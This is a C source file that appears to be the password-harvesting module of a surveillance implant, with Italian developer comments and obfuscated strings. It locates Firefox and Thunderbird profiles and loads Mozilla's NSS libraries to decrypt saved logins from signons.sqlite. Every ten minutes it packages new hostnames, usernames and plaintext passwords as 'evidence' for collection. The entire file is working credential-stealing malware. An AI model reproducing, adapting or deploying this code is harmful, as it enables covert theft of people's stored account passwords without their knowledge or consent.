#define _BSD_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/limits.h>
#include <dlfcn.h>
#include <time.h>
#include <sqlite3.h>
#include <nss/nss.h>
#include <nss/secitem.h>
#include <nss/pk11sdr.h>
#include <nss/nssb64.h>
#include <openssl/bio.h>

#include "module.h"
#include "evidencemanager.h"
#include "me.h"
#include "so.h"
#include "utfutils.h"

/* XXX TODO riabilitare il loading dinamico di sqlite quando verranno tolte le altre dipendenze */
#if 0
#define sqlite3_open (*P_sqlite3_open)
static int (*P_sqlite3_open)(const char *, sqlite3 **);
#define sqlite3_exec (*P_sqlite3_exec)
static int (*P_sqlite3_exec)(sqlite3 *, const char *, int (*)(void *, int, char **, char **), void *, char **);
#define sqlite3_close (*P_sqlite3_close)
static int (*P_sqlite3_close)(sqlite3 *);
#endif

#define NSS_Init (*P_NSS_Init)
static SECStatus (*P_NSS_Init)(const char *);
#define NSS_Shutdown (*P_NSS_Shutdown)
static SECStatus (*P_NSS_Shutdown)(void);
#define NSSBase64_DecodeBuffer (*P_NSSBase64_DecodeBuffer)
static SECItem *(*P_NSSBase64_DecodeBuffer)(PLArenaPool *, SECItem *, const char *, unsigned int);
#define SECITEM_ZfreeItem (*P_SECITEM_ZfreeItem)
static void (*P_SECITEM_ZfreeItem)(SECItem *, PRBool);
#define PK11SDR_Decrypt (*P_PK11SDR_Decrypt)
static SECStatus (*P_PK11SDR_Decrypt)(SECItem *, SECItem *, void *);

static void getmozilla(void);
static void getmozillaaccounts(const char *appname, const char *profiledir);
static int mozillacallback(void *arg, int num, char **val, char **key);

struct entry {
   char *resource;
   char *service;
   char *user;
   char *pass;
   struct entry *next;
};

static struct entry *list = NULL, *listp = NULL;
static time_t begin, end;

void *module_password_start(void *args)
{
   BIO *bio_data = NULL;
   int datalen, i;
   char *dataptr;
   FILE *fp = NULL;
   char line[32];
   
   debugme("Running module PASSWORD\n");

   while(MODULE_PASSWORD.status != MODULE_STOPPING) {
      if(MODULE_PASSWORD.status == MODULE_STARTING) MODULE_PASSWORD.status = MODULE_STARTED;

      do {
         begin = 0;
         if(!(fp = fopen(SO"fb307d3c", "r"))) break;
         if(!fgets(line, sizeof(line), fp)) break;
         begin = atoi(line);
      } while(0);
      if(fp) {
         fclose(fp);
         fp = NULL;
      }

      do {
         end = time(NULL);
         if(!(fp = fopen(SO"fb307d3c", "w"))) break;
         fprintf(fp, "%lu", end);
      } while(0);
      if(fp) {
         fclose(fp);
         fp = NULL;
      }

      do {
         getmozilla();

         debugme("- Password dump begin\n");
         for(listp = list; listp; listp = listp->next) debugme("--- %s %s %s %s\n", listp->resource, listp->service, listp->user, listp->pass);
         debugme("- Password dump end\n");

         if(!(bio_data = BIO_new(BIO_s_mem()))) break;
         for(listp = list; listp; listp = listp->next) {
            if(listp->resource[0]) if(BIO_puts16(bio_data, listp->resource)) break;
            if(BIO_write(bio_data, "\x00\x00", 2) != 2) break;
            if(listp->user[0]) if(BIO_puts16(bio_data, listp->user)) break;
            if(BIO_write(bio_data, "\x00\x00", 2) != 2) break;
            if(listp->pass[0]) if(BIO_puts16(bio_data, listp->pass)) break;
            if(BIO_write(bio_data, "\x00\x00", 2) != 2) break;
            if(listp->service[0]) if(BIO_puts16(bio_data, listp->service)) break;
            if(BIO_write(bio_data, "\x00\x00", 2) != 2) break;
            if(BIO_write(bio_data, "\xDE\xC0\xAD\xAB", 4) != 4) break;
         }
         if(listp) break;

         if(!(datalen = BIO_get_mem_data(bio_data, &dataptr))) break;
         evidence_write(EVIDENCE_TYPE_PASSWORD, NULL, 0, dataptr, datalen);
      } while(0);

      if(bio_data) {
         BIO_free(bio_data);
         bio_data = NULL;
      }

      for(listp = list; listp;) {
         list = listp;
         listp = listp->next;
         if(list->resource) free(list->resource);
         if(list->service) free(list->service);
         if(list->user) free(list->user);
         if(list->pass) free(list->pass);
         free(list);
      }
      list = NULL;

      for(i = 600; i && (MODULE_PASSWORD.status != MODULE_STOPPING); i--) sleep(1);
   }

   MODULE_PASSWORD.status = MODULE_STOPPED;

   return NULL;
}

void getmozilla(void)
{
   char profiles[PATH_MAX], profilepath[PATH_MAX], line[1024], *profiledir = NULL;
   FILE *fp = NULL;
   int relative = 1;

   do {
      if(snprintf(profiles, sizeof(profiles), SO"%s/.mozilla/firefox/profiles.ini", getenv(SO"HOME")) >= sizeof(profiles)) break;
      if(!(fp = fopen(profiles, "r"))) break;
      while(!feof(fp)) {
         if(!fgets(line, sizeof(line), fp)) break;
         if(!strncmp(line, SO"IsRelative=", strlen(SO"IsRelative="))) relative = atoi(line + strlen(SO"IsRelative="));
         if(!strncmp(line, SO"Path=", strlen(SO"Path="))) {
            profiledir = line + strlen(SO"Path=");
            while(profiledir[strlen(profiledir) - 1] == '\n') profiledir[strlen(profiledir) - 1] = '\0';
            if(relative) {
               if(snprintf(profilepath, sizeof(profilepath), SO"%s/.mozilla/firefox/%s", getenv(SO"HOME"), profiledir) >= sizeof(profilepath)) continue;
               profiledir = profilepath;
            }
            getmozillaaccounts(SO"firefox", profiledir);
         }
      }
   } while(0);
   if(fp) fclose(fp);
   fp = NULL;

   do {
      if(snprintf(profiles, sizeof(profiles), SO"%s/.thunderbird/profiles.ini", getenv(SO"HOME")) >= sizeof(profiles)) break;
      if(!(fp = fopen(profiles, "r"))) break;
      while(!feof(fp)) {
         if(!fgets(line, sizeof(line), fp)) break;
         if(!strncmp(line, SO"IsRelative=", strlen(SO"IsRelative="))) relative = atoi(line + strlen(SO"IsRelative="));
         if(!strncmp(line, SO"Path=", strlen(SO"Path="))) {
            profiledir = line + strlen(SO"Path=");
            while(profiledir[strlen(profiledir) - 1] == '\n') profiledir[strlen(profiledir) - 1] = '\0';
            if(relative) {
               if(snprintf(profilepath, sizeof(profilepath), SO"%s/.thunderbird/%s", getenv(SO"HOME"), profiledir) >= sizeof(profilepath)) continue;
               profiledir = profilepath;
            }
            getmozillaaccounts(SO"thunderbird", profiledir);
         }
      }
   } while(0);
   if(fp) fclose(fp);
   fp = NULL;

   return;
}

static void getmozillaaccounts(const char *appname, const char *profiledir)
{
   void *h1 = NULL, *h2 = NULL, *h3 = NULL, *h4 = NULL;
   sqlite3 *db = NULL;
   SECStatus status = SECFailure;
   FILE *fp = NULL;
   char compatibility[PATH_MAX], signons[PATH_MAX], libpath[PATH_MAX], line[1024], *libdir = NULL, query[256];;

   do {
      do {
         if(snprintf(compatibility, sizeof(compatibility), SO"%s/compatibility.ini", profiledir) >= sizeof(compatibility)) break;
         if(!(fp = fopen(compatibility, "r"))) break;
         while(!feof(fp)) {
            if(!fgets(line, sizeof(line), fp)) break;
            if(!strncmp(line, SO"LastAppDir=", strlen(SO"LastAppDir="))) {
               libdir = line + strlen(SO"LastAppDir=");
               while(libdir[strlen(libdir) - 1] == '\n') libdir[strlen(libdir) - 1] = '\0';
               break;
            }
         }
      } while(0);
      if(fp) fclose(fp);

      do {
         if(libdir) {
            if(snprintf(libpath, sizeof(libpath), SO"%s/libmozsqlite3.so", libdir) >= sizeof(libpath)) break;
            if((h1 = dlopen(libpath, RTLD_NOW))) break;
         }
         if(snprintf(libpath, sizeof(libpath), SO"/usr/lib/%s/libmozsqlite3.so", appname) >= sizeof(libpath)) break;
         if((h1 = dlopen(libpath, RTLD_NOW))) break;
      } while(0);
      if(!h1) break;

/* XXX TODO riabilitare il loading dinamico di sqlite quando verranno tolte le altre dipendenze */
#if 0
      if(!(*(void **)(&P_sqlite3_open) = dlsym(h1, SO"sqlite3_open"))) break;
      if(!(*(void **)(&P_sqlite3_exec) = dlsym(h1, SO"sqlite3_exec"))) break;
      if(!(*(void **)(&P_sqlite3_close) = dlsym(h1, SO"sqlite3_close"))) break;
#endif

      do {
         if(libdir) {
            if(snprintf(libpath, sizeof(libpath), SO"%s/libnss3.so", libdir) >= sizeof(libpath)) break;
            if((h2 = dlopen(libpath, RTLD_NOW))) break;
         }
         if(snprintf(libpath, sizeof(libpath), SO"/usr/lib/%s/libnss3.so", appname) >= sizeof(libpath)) break;
         if((h2 = dlopen(libpath, RTLD_NOW))) break;
      } while(0);
      if(!h2) break;

      if(!(*(void **)(&P_NSS_Init) = dlsym(h2, SO"NSS_Init"))) break;
      if(!(*(void **)(&P_NSS_Shutdown) = dlsym(h2, SO"NSS_Shutdown"))) break;
      if(!(*(void **)(&P_NSSBase64_DecodeBuffer) = dlsym(h2, SO"NSSBase64_DecodeBuffer"))) break;
      if(!(*(void **)(&P_SECITEM_ZfreeItem) = dlsym(h2, SO"SECITEM_ZfreeItem"))) break;
      if(!(*(void **)(&P_PK11SDR_Decrypt) = dlsym(h2, SO"PK11SDR_Decrypt"))) break;

      do {
         if(libdir) {
            if(snprintf(libpath, sizeof(libpath), SO"%s/libsoftokn3.so", libdir) >= sizeof(libpath)) break;
            if((h3 = dlopen(libpath, RTLD_NOW))) break;
         }
         if(snprintf(libpath, sizeof(libpath), SO"/usr/lib/%s/libsoftokn3.so", appname) >= sizeof(libpath)) break;
         if((h3 = dlopen(libpath, RTLD_NOW))) break;
      } while(0);
      if(!h3) break;

      do {
         if(libdir) {
            if(snprintf(libpath, sizeof(libpath), SO"%s/libnssckbi.so", libdir) >= sizeof(libpath)) break;
            if((h4 = dlopen(libpath, RTLD_NOW))) break;
         }
         if(snprintf(libpath, sizeof(libpath), SO"/usr/lib/%s/libnssckbi.so", appname) >= sizeof(libpath)) break;
         if((h4 = dlopen(libpath, RTLD_NOW))) break;
      } while(0);
      if(!h4) break;

      if((status = NSS_Init(profiledir)) != SECSuccess) break;

      if(snprintf(signons, sizeof(signons), SO"%s/signons.sqlite", profiledir) >= sizeof(signons)) break;
      if(snprintf(query, sizeof(query), SO"SELECT hostname, encryptedUsername, encryptedPassword, timePasswordChanged FROM moz_logins WHERE timePasswordChanged BETWEEN %lu000000 AND %lu000000", begin, end) >= sizeof(query)) break;

      if(sqlite3_open(signons, &db) != SQLITE_OK) break;
      if(sqlite3_exec(db, query, mozillacallback, (void *)appname, NULL) != SQLITE_OK) break;
   } while(0);
/* XXX TODO riabilitare il loading dinamico di sqlite quando verranno tolte le altre dipendenze */
#if 0
   if(db && sqlite3_close) sqlite3_close(db);
#else
   if(db) sqlite3_close(db);
#endif
   if((status == SECSuccess) && NSS_Shutdown) NSS_Shutdown();
   if(h1) dlclose(h1);
   if(h2) dlclose(h2);
   if(h3) dlclose(h3);
   if(h4) dlclose(h4);

   return;
}

static int mozillacallback(void *arg, int num, char **val, char **key)
{
   SECItem *enc = NULL, user = { siBuffer, NULL, 0 }, pass = { siBuffer, NULL, 0 };

   do {
      if(num != 4) break;

      if(!(enc = NSSBase64_DecodeBuffer(NULL, NULL, val[1], strlen(val[1])))) break;
      if(PK11SDR_Decrypt(enc, &user, NULL) != SECSuccess) break;
      SECITEM_ZfreeItem(enc, PR_TRUE);

      if(!(enc = NSSBase64_DecodeBuffer(NULL, NULL, val[2], strlen(val[2])))) break;
      if(PK11SDR_Decrypt(enc, &pass, NULL) != SECSuccess) break;

      if(!list) {
         if(!(list = malloc(sizeof(struct entry)))) break;
         listp = list;
      } else {
         if(!(listp->next = malloc(sizeof(struct entry)))) break;
         listp = listp->next;
      }

      listp->next = NULL;
      listp->resource = strdup(arg ? arg : "");
      listp->service = strdup(val[0] ? val[0] : "");
      if((listp->user = malloc(user.len + 1))) {
         strncpy(listp->user, (char *)user.data, user.len);
         listp->user[user.len] = '\0';
      }
      if((listp->pass = malloc(pass.len + 1))) {
         strncpy(listp->pass, (char *)pass.data, pass.len);
         listp->pass[pass.len] = '\0';
      }
   } while(0);
   if(enc) SECITEM_ZfreeItem(enc, PR_TRUE);
   if(user.data) SECITEM_ZfreeItem(&user, PR_FALSE);
   if(pass.data) SECITEM_ZfreeItem(&pass, PR_FALSE);

   return 0;
}
